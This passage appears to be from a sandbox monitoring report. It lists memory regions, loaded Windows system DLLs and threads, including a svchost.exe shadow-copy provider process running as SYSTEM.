mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1293 start_va = 0x75b00000 end_va = 0x75b11fff monitored = 0 entry_point = 0x75b01441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1294 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1295 start_va = 0x75c50000 end_va = 0x75decfff 
monitored = 0 entry_point = 0x75c517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1296 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1297 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1298 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1299 start_va = 0x75fa0000 end_va = 0x75ff6fff monitored = 0 entry_point = 0x75fb9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1300 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1301 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1302 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1303 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file 
name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1304 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1305 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1306 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1307 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1308 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1309 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1310 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1311 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 
"c:\\windows\\system32\\apisetschema.dll") Region: id = 1312 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1313 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1314 start_va = 0x7ffd3000 end_va = 0x7ffd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1315 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1316 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1317 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1318 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1319 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1320 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1321 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1322 start_va = 0x74a20000 end_va = 0x74b14fff monitored = 0 entry_point = 0x74a30d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1323 start_va = 0x63450000 end_va = 
0x634cafff monitored = 0 entry_point = 0x63453d3e region_type = mapped_file name = "catsrvut.dll" filename = "\\Windows\\System32\\catsrvut.dll" (normalized: "c:\\windows\\system32\\catsrvut.dll") Region: id = 1324 start_va = 0x6a860000 end_va = 0x6a869fff monitored = 1 entry_point = 0x6a861190 region_type = mapped_file name = "mfcsubs.dll" filename = "\\Windows\\System32\\mfcsubs.dll" (normalized: "c:\\windows\\system32\\mfcsubs.dll") Region: id = 1325 start_va = 0xde0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 1326 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Thread: id = 86 os_tid = 0x910 Thread: id = 87 os_tid = 0x914 Thread: id = 88 os_tid = 0x8f8 Thread: id = 89 os_tid = 0x8f4 [0109.908] malloc (_Size=0x80) returned 0x48e7b0 Thread: id = 90 os_tid = 0x1b8 Thread: id = 91 os_tid = 0x8f0 Thread: id = 92 os_tid = 0x8ec Thread: id = 93 os_tid = 0xa9c Thread: id = 114 os_tid = 0xd9c Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ef473e0" os_pid = "0xa70" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005e2aa" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1327 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" 
Region: id = 1328 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1329 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1330 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1331 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1332 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1333 start_va = 0xd0000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1334 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1335 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1336 start_va = 0x140000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1337 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1338 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1339 start_va = 0x260000 end_va = 
0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1340 start_va = 0x310000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1341 start_va = 0x370000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1342 start_va = 0x470000 end_va = 0x73efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1343 start_va = 0x740000 end_va = 0x807fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1344 start_va = 0x810000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1345 start_va = 0xa10000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1346 start_va = 0xa70000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1347 start_va = 0xfe0000 end_va = 0xfe7fff monitored = 0 entry_point = 0xfe2104 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1348 start_va = 0x69ce0000 end_va = 0x69d2efff monitored = 0 entry_point = 0x69ce14f6 region_type = mapped_file name = "swprv.dll" filename = "\\Windows\\System32\\swprv.dll" (normalized: "c:\\windows\\system32\\swprv.dll") Region: id = 1349 start_va = 0x6bd60000 end_va = 0x6bd66fff monitored = 0 entry_point = 0x6bd62b44 region_type = mapped_file name = "fltlib.dll" filename = 
"\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 1350 start_va = 0x6c710000 end_va = 0x6c719fff monitored = 0 entry_point = 0x6c714aac region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 1351 start_va = 0x6dc20000 end_va = 0x6dc2ffff monitored = 0 entry_point = 0x6dc21270 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1352 start_va = 0x6fb50000 end_va = 0x6fb57fff monitored = 0 entry_point = 0x6fb53a49 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 1353 start_va = 0x73bf0000 end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1354 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1355 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1356 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1357 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: 
"c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1358 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1359 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1360 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1361 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1362 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1363 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1364 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1365 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1366 
start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1367 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1368 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1369 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1370 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1371 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1372 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1373 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1374 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = 
mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1375 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1376 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1377 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1378 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1379 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1380 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1381 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1382 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1383 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1384 start_va = 0x130000 end_va = 0x137fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1385 start_va = 0xab0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type 
= private name = "private_0x0000000000ab0000" filename = "" Region: id = 1386 start_va = 0x6dc30000 end_va = 0x6dd45fff monitored = 0 entry_point = 0x6dc31590 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Thread: id = 94 os_tid = 0xa84 Thread: id = 95 os_tid = 0xa74 Thread: id = 96 os_tid = 0xa90 Thread: id = 97 os_tid = 0xa88 Thread: id = 98 os_tid = 0xa80 Thread: id = 99 os_tid = 0xa78 Thread: id = 103 os_tid = 0xaf4 Thread: id = 116 os_tid = 0xdcc